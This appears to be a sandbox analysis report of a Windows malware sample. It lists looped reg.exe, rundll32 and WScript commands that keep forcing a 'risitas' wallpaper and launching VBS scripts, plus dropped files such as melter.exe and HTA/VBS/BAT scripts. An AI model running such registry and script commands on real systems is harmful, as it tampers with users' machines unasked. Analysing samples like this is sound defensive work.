C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

Network

Files

C:\Users\Admin\AppData\Local\Temp\66C4.tmp\66C5.tmp\66C6.bat

C:\Users\Admin\AppData\Local\Temp\32120.vbs

C:\Users\Admin\AppData\Local\Temp\1230.vbs

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vm3ocmwb.ncs.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\19765.vbs

C:\Users\Admin\AppData\Local\Temp\risitas.hta

C:\Users\Admin\AppData\Local\Temp\2297.vbs

C:\Users\Admin\AppData\Local\Temp\26761.vbs

C:\Users\Admin\AppData\Local\Temp\20056.vbs

C:\Users\Admin\AppData\Local\Temp\15233.vbs

C:\Users\Admin\AppData\Local\Temp\6180.vbs

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

C:\Users\Admin\AppData\Local\Temp\17222.bat

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg

C:\Users\Admin\AppData\Local\Temp\melter.exe

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_27B7CC8EC38D4CCA834CF42C0CC93BF4.dat
